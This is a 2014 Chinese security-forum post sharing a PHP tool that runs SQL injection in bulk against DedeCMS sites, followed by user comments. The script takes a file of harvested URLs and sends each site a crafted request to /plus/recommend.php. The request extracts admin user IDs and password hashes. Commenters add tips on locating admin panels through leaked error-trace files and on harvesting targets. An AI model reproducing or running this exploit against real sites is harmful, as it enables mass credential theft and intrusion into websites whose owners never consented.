DEDE批量爆菊

Sunshie (博客求大牛友链http://phpinfo.me) | 2014-02-28 21:00 

<?php

print_r(
"
+------------------------------------+
DEDECMS批量爆菊利用工具
By :Sunshie
QQ:1141056911求交流
Usage: $argv[0] Filename
Example: php.exe $argv[0] url.txt
url.txt是你采集的网址文件!
+------------------------------------+
\r\n\r\n\r\n"
);
$filename=$argv[1];
if(!file_exists($filename)) echo "o(╯□╰)o你妹的 你采集的文件呢?\r\n";
$conts = file_get_contents($filename);
$arrConts = explode("\n",$conts);
$arrConts=str_replace(" ","",$arrConts);
$arrConts=str_replace("\r","",$arrConts);
$arrConts=str_replace("\n","",$arrConts);
//print_r($arrConts );
for($i=0;isset($arrConts[$i]);$i++){
echo fuckdede($arrConts[$i]);
}

function fuckdede($sb){
$sb=str_replace("http://","",$sb);
$expp="http://".$sb."/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23";
$exp=@file_get_contents($expp);
eregi("_<abc>(.*)</abc>_", $exp, $arr);
$exploit=str_replace("_<abc>", "==fuck", $arr[0]);
$exploit=str_replace("</abc>_", "fuck==", $exploit);
return "网址:".$sb."注入结果 :".$exploit."\r\n--------------------------\r\n";
}
?>

以上代码保存为ANSI格式

效果如下

批量注入效果

[原文地址]

各种吐槽:

1#

404 (我要死了) | 2014-02-28 21:01

Mark!

2#

ver007 | 2014-02-28 21:02

///////////////////////////////

3#

中国公民 (恩?) | 2014-02-28 21:20

没后台,谁共享个找后台的技巧。

常用的

data/mysqli_error_trace.inc

data/mysql_error_trace.inc

4#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-28 21:28

少年没有google采集哦。

5#

乌云 ()?                      () | 2014-02-28 21:45

@园长 google现在正则匹配好麻烦,以前的API也没了,不知道园长MM有啥好的采集方法?

6#

爱上平顶山 (爱上平顶山) | 2014-02-28 21:53

@园长 你的博客 路径啥的泄露了

7#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-28 21:56

@爱上平顶山 无聊出来透透气,后面还有个<!--dou ni wan -->。

8#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-28 21:58

@乌云 google 很简单,可以看下我之前发的s2那个http://zone.wooyun.org/content/8385。

9#

乌云 ()?                      () | 2014-02-28 22:06

@园长 强大的正则!

10#

TellYouThat | 2014-02-28 22:35

神速啊都。。

11#

浪子老柒 | 2014-02-28 22:59

mark..

12#

忆苦思甜 (只是一个傻逼。) | 2014-02-28 23:57

怎么保存结果。

13#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-03-01 09:28

mark...

留言评论(旧系统):

yyy333 @ 2014-03-01 13:25:05

没后台有鸡毛用 …… DEDE可以改后台比较蛋疼

本站回复:

╮(╯_╰)╭

佚名 @ 2014-03-01 13:51:52

用 python 写更为简便....

本站回复:

用 java 写更为简便,java是最好的编程语言!不服来辩!╮(╯_╰)╭

佚名 @ 2014-03-01 16:43:44

用别人写好的工具最方便....

本站回复:

-_-|||

depycode @ 2014-03-01 18:29:42

这也叫 EXP 自己写的很少,就是把别人发现的关键字加进去而已。。。。

本站回复:

so?